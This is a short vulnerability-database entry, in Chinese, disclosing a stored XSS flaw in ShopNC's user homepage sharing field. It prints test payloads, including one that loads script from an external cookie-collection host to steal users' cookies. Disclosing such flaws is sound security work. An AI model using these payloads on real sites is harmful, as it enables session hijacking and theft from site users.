...">shopnc最新版存储型xss漏洞 - exploit database | Vulners.com ..."> ..."> ...">
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:96149
HistoryApr 03, 2014 - 12:00 a.m.

shopnc最新版存储型xss漏洞

2014-04-0300:00:00
Root
www.seebug.org
13
JSON

简要描述:

shopnc存储型xss漏洞

详细说明:

shopnc版本测试http://www.shopnctest.com/c2c/2013/demo/
shopnc用户个人主页处存在存储型XSS,可以获取用户敏感cookie信息。
在买家首页,分享心情处

<img src=“https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg” alt=“a.jpg” width=“600”>

测试代码为:"&gt;<img src />&lt;scriPt &gt;alert(document.cookie)&lt;/scripT&gt;// cookie收信平台 "&gt;<img src />&lt;scriPt src=http://xss.hk/ytcXRW?1396447777&gt;alert(document.cookie)&lt;/scripT&gt;/
如图

<img src=“https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg” alt=“b.jpg” width=“600”>

漏洞证明:

如上描述

JSON